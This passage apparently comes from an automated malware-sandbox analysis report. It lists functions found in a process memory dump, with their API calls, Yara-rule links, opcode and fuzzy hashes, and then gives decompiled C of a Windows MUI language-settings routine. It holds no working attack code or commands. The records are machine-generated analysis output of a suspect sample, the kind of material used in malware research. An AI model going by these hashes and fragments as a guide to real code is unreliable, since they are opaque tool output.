
                                                              Function 000A72F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 000A7398
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: 426973fb1a57eff7d1f100196f40cf351785a3edbd583783db48d78446031429
                                                              • Instruction ID: 38cba8984eefe752fa7b163216615703bd16d569377c35ffa56637d32947edee
                                                              • Opcode Fuzzy Hash: 426973fb1a57eff7d1f100196f40cf351785a3edbd583783db48d78446031429
                                                              • Instruction Fuzzy Hash: 7B319476505604ABC725DFA4CCA1F9BB7F8EF49700F00851DF61E9B242D774A545CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A72E6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 000A7398
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: 950253503fb4bd97ad80c132c92d0f2216a6634fe4292f92aa547fa2d9e51b9e
                                                              • Instruction ID: 0a5cc15383a1448a8345aae896b51dd56db6eb36cf7814303cf8591e01dd464a
                                                              • Opcode Fuzzy Hash: 950253503fb4bd97ad80c132c92d0f2216a6634fe4292f92aa547fa2d9e51b9e
                                                              • Instruction Fuzzy Hash: E921C372605701ABDB10DFA4CCA1FABB7B4BF49700F04C129FA1D9B242D375A505CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A88D2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093B93), ref: 000A890D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                              • Opcode ID: d0a13aa887bf1bcf8b9e5e6a3c7c33113e04e2d1beabdd7ae9b7077de881bf48
                                                              • Instruction ID: 93b4d299feac04a85447ebf7d8800405dcf80a5e0a794ebfeee3fcc81208a254
                                                              • Opcode Fuzzy Hash: d0a13aa887bf1bcf8b9e5e6a3c7c33113e04e2d1beabdd7ae9b7077de881bf48
                                                              • Instruction Fuzzy Hash: D4E09AB5200205AFDB18DF99CC49EE7376CEF88314F124258FD0CAB241C630E800CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A88A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(&5,?,000A3C9F,000A3C9F,?,000A3526,?,?,?,?,?,00000000,00000000,?), ref: 000A88CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: &5
                                                              • API String ID: 1279760036-2170931432
                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                              • Instruction ID: 18d41ebc1444f41b350e3a920bdccbd8c581643fd71c7df34907e2f0f6060788
                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                              • Instruction Fuzzy Hash: 02E012B1200208ABDB18EF99CC45EA777ACAF88650F118558BE085B242C630F910CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A88E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093B93), ref: 000A890D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                              • Instruction ID: 3a995d48352bad541af9a6cb6c361c68b92ee5e87edbe0ccdb8fe2666c5a86d2
                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                              • Instruction Fuzzy Hash: 34E046B1200208ABDB18EF99CC49EE777ACEF88750F018558FE085B242C630F910CAF0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00097280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000972DA
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000972FB
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                                                              • Instruction ID: 2ea57da1483fa17f38e7042d9b790a2bd493d484ede8502a5c5e2f473453cf50
                                                              • Opcode Fuzzy Hash: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                                                              • Instruction Fuzzy Hash: DA01A232A9022877EB21AAD49C03FFE776C5B01F51F140118FF04BA1C2EA946A0686F6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00099B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00099BA2
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                              • Instruction ID: 19e7b860dcfa212706bbc2e41f8c1513753d07dc705e0322668f6be7cfae852e
                                                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                              • Instruction Fuzzy Hash: A4011EB6E4020DABDF10EAE4ED42FDDB3B89B54308F1081A5E90997242F675EB14CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A894D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000A89A4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: c70c7b23ec2e81a353d697749c64253b589da28e2b0d9e3d7a697f02cf381c76
                                                              • Instruction ID: 7458131c60aa693a545463d1f9b831aaef465d695652a3894a5b4930626a625e
                                                              • Opcode Fuzzy Hash: c70c7b23ec2e81a353d697749c64253b589da28e2b0d9e3d7a697f02cf381c76
                                                              • Instruction Fuzzy Hash: BF01F2B6218149AFCB04DF98DC80DEB3BADAF8C310F158259FA5997242C630E841CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A8950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000A89A4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                              • Instruction ID: 85d944d88791a119dc52ac9705a390e81529bee0f2e7033d89e8d987ba481416
                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                              • Instruction Fuzzy Hash: 5001B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A7420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009CCE0,?,?), ref: 000A745C
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
                                                              • Instruction ID: 563750b36e0471d80323907d22ec42354e87ed4b7c5380fccc3df89f309d2e41
                                                              • Opcode Fuzzy Hash: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
                                                              • Instruction Fuzzy Hash: E6E06D733802143AE22065E9AC02FE7B39C9B86B60F140026FA0DEA2C2D595F80142A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A7414, Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009CCE0,?,?), ref: 000A745C
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 3397d01499b01ee01d0892d03f7dfb7e273773ddbf3fb6ef5d0ba36510e0fbb5
                                                              • Instruction ID: 5824ae299e6897bacd592b4abc7ba281ebdbf80f8ae35f6988f1e169bef35a31
                                                              • Opcode Fuzzy Hash: 3397d01499b01ee01d0892d03f7dfb7e273773ddbf3fb6ef5d0ba36510e0fbb5
                                                              • Instruction Fuzzy Hash: FFF0E5767902003AE73175A89C02FE7B3999BD6B11F24442AF609EB2C2D9A6F8018295
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A8A31, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009CFB2,0009CFB2,?,00000000,?,?), ref: 000A8A70
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: fc54935a018e572b747dcd3b19f3009970d3bd0b13b99c99576e54c1c70ee7cd
                                                              • Instruction ID: 3c4ffa9c06be34856b7043c38693de99361604ec15e8e06b96147c42f497701f
                                                              • Opcode Fuzzy Hash: fc54935a018e572b747dcd3b19f3009970d3bd0b13b99c99576e54c1c70ee7cd
                                                              • Instruction Fuzzy Hash: 99F0A0B2240204AFCB14DF54DC84EE77BA9EF89350F018659F949A7251C630E825CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A8913, Relevance: 1.5, APIs: 1, Instructions: 27processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000A89A4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 143e90bc2182b101ed28672d613a3aec9570e93f5f7d8e7a77cfaf92551bba8e
                                                              • Instruction ID: 2eb5836ba941d4dbae4c7a9f601d72d90f591ad1ce7f0746c94d07ad3b183e99
                                                              • Opcode Fuzzy Hash: 143e90bc2182b101ed28672d613a3aec9570e93f5f7d8e7a77cfaf92551bba8e
                                                              • Instruction Fuzzy Hash: 23E09AB221440AAF8715CF99EC80DEB73A9FF9D715724870DFA9D97154C630E8528BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A8A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009CFB2,0009CFB2,?,00000000,?,?), ref: 000A8A70
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                              • Instruction ID: 754898064e043c9f3d447088fe35458f1f7067329602d148fa2bcd448ff9004c
                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                              • Instruction Fuzzy Hash: 43E01AB12002086BDB14DF89CC85EE737ADAF89650F018154BE0857242C930E8108BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0009D417, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00097C83,?), ref: 0009D44B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 0f46b8623df097be6b3162150fd792eff68c921a1b467b591fc1667404a0fedd
                                                              • Instruction ID: c39e010ebbbe3a28bfd7b8a66b4941faeeeed09dafebaa63c614b6a58fadbb66
                                                              • Opcode Fuzzy Hash: 0f46b8623df097be6b3162150fd792eff68c921a1b467b591fc1667404a0fedd
                                                              • Instruction Fuzzy Hash: E2D02E32BA03012BFA10FBF08C0AF6A22C66B81B40F884424F848EF2C3DE34E2004520
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0009D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00097C83,?), ref: 0009D44B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                              • Instruction ID: bea470ed4192327647c815e024236da05c442eef73666c2440b8aa7e25200685
                                                              • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                              • Instruction Fuzzy Hash: 92D0A7717903043BEA10FBE49C03F6672CC5B45B00F494074F948D73C3D964F5004161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 02038788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 94%
                                                              			E02038788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02038460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0201E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0203718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02038460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0203718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02038460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02038460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02038460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0203718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0201E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02012340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0202E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0201E2A8(_t322,  &_v68, _v16);
								if(E02035553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0202E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0201E2A8(_t322,  &_v68, _t236);
								if(E02035553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0203718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0201E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02012340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0202E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0201E2A8(_v12,  &_v68, _v16);
							if(E02035553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0202E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0201E2A8(_t322,  &_v68, _t269);
							if(E02035553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0203718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0201E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02012340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0202E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0201E2A8(_v12,  &_v68, _v16);
						if(E02035553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0202E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0201E2A8(_t322,  &_v68, _t296);
						if(E02035553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0201E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                              0x02038788
                                                              0x02038788
                                                              0x02038791
                                                              0x02038794
                                                              0x02038798
                                                              0x0203879b
                                                              0x0203879e
                                                              0x020387a1
                                                              0x020387a4
                                                              0x020387a7
                                                              0x020387aa
                                                              0x020387af
                                                              0x02081ad3
                                                              0x02038b0a
                                                              0x02038b0d
                                                              0x02038b13
                                                              0x02038b19
                                                              0x02038b1f
                                                              0x02038b25
                                                              0x02038b2b
                                                              0x02038b31
                                                              0x02038b37
                                                              0x02038b3d
                                                              0x02038b46
                                                              0x02038b46
                                                              0x020387c6
                                                              0x020387d0
                                                              0x02081ae0
                                                              0x02081ae6
                                                              0x02081af8
                                                              0x02081af8
                                                              0x02081afd
                                                              0x02081afe
                                                              0x02081b01
                                                              0x02081b06
                                                              0x02081b06
                                                              0x020387d6
                                                              0x020387f2
                                                              0x020387f7
                                                              0x02038807
                                                              0x0203880a
                                                              0x0203880f
                                                              0x02038810
                                                              0x02038813
                                                              0x02038818
                                                              0x02038818
                                                              0x0203882c
                                                              0x02038831
                                                              0x02038838
                                                              0x02038908
                                                              0x02038920
                                                              0x020389f0
                                                              0x02038a08
                                                              0x02038af6
                                                              0x02038af6
                                                              0x02038af8
                                                              0x02038afb
                                                              0x02081beb
                                                              0x02081beb
                                                              0x02038b04
                                                              0x02081bf8
                                                              0x02081c0e
                                                              0x02081c13
                                                              0x02081c16
                                                              0x02081c16
                                                              0x02081bf8
                                                              0x00000000
                                                              0x02038b04
                                                              0x02038a0e
                                                              0x02038a11
                                                              0x02038a14
                                                              0x02038a15
                                                              0x02038a18
                                                              0x02038a22
                                                              0x02038b59
                                                              0x02038a28
                                                              0x02038a3c
                                                              0x02038a3c
                                                              0x02038a42
                                                              0x02081bb0
                                                              0x02081b11
                                                              0x02081b11
                                                              0x00000000
                                                              0x02038a48
                                                              0x02038a51
                                                              0x02038a5b
                                                              0x02038a5e
                                                              0x02038a61
                                                              0x02038a69
                                                              0x02038a69
                                                              0x02038a6d
                                                              0x00000000
                                                              0x00000000
                                                              0x02038a74
                                                              0x02038a7c
                                                              0x02038a7d
                                                              0x02038a91
                                                              0x02038a93
                                                              0x02038a93
                                                              0x02038a98
                                                              0x02038a9b
                                                              0x02038aa1
                                                              0x02038aa1
                                                              0x02038aa4
                                                              0x02038aaa
                                                              0x02038ab1
                                                              0x02038ac5
                                                              0x02038ac7
                                                              0x02038ac7
                                                              0x02038ac5
                                                              0x02038ace
                                                              0x02081bc9
                                                              0x02081bce
                                                              0x02081bd2
                                                              0x02081bd2
                                                              0x02038ad8
                                                              0x02038aeb
                                                              0x02038aeb
                                                              0x02038af0
                                                              0x02038af4
                                                              0x00000000
                                                              0x02038af4
                                                              0x02038a42
                                                              0x02038926
                                                              0x02038929
                                                              0x0203892c
                                                              0x0203892d
                                                              0x02038930
                                                              0x02038935
                                                              0x0203893a
                                                              0x02038b51
                                                              0x02038940
                                                              0x02038954
                                                              0x02038954
                                                              0x0203895a
                                                              0x02081b63
                                                              0x00000000
                                                              0x02038960
                                                              0x02038969
                                                              0x02038973
                                                              0x02038976
                                                              0x02038979
                                                              0x0203897e
                                                              0x02038981
                                                              0x02038981
                                                              0x02038986
                                                              0x00000000
                                                              0x00000000
                                                              0x02081b6e
                                                              0x02081b74
                                                              0x02081b7b
                                                              0x02081b8f
                                                              0x02081b91
                                                              0x02081b91
                                                              0x02081b99
                                                              0x02081b9c
                                                              0x02081ba2
                                                              0x02081ba2
                                                              0x0203898c
                                                              0x02038992
                                                              0x02038999
                                                              0x020389ad
                                                              0x02081ba8
                                                              0x02081ba8
                                                              0x020389ad
                                                              0x020389b6
                                                              0x020389c8
                                                              0x020389cd
                                                              0x020389d0
                                                              0x020389d0
                                                              0x020389d6
                                                              0x020389e8
                                                              0x020389e8
                                                              0x020389ed
                                                              0x00000000
                                                              0x020389ed
                                                              0x0203895a
                                                              0x0203883e
                                                              0x02038841
                                                              0x02038844
                                                              0x02038845
                                                              0x02038848
                                                              0x0203884d
                                                              0x02038852
                                                              0x02038b49
                                                              0x02038858
                                                              0x0203886c
                                                              0x0203886c
                                                              0x02038872
                                                              0x02081b0e
                                                              0x00000000
                                                              0x02038878
                                                              0x02038881
                                                              0x0203888b
                                                              0x0203888e
                                                              0x02038891
                                                              0x02038896
                                                              0x02038899
                                                              0x02038899
                                                              0x0203889e
                                                              0x00000000
                                                              0x00000000
                                                              0x02081b21
                                                              0x02081b27
                                                              0x02081b2e
                                                              0x02081b42
                                                              0x02081b44
                                                              0x02081b44
                                                              0x02081b4c
                                                              0x02081b4f
                                                              0x02081b55
                                                              0x02081b55
                                                              0x020388a4
                                                              0x020388aa
                                                              0x020388b1
                                                              0x020388c5
                                                              0x02081b5b
                                                              0x02081b5b
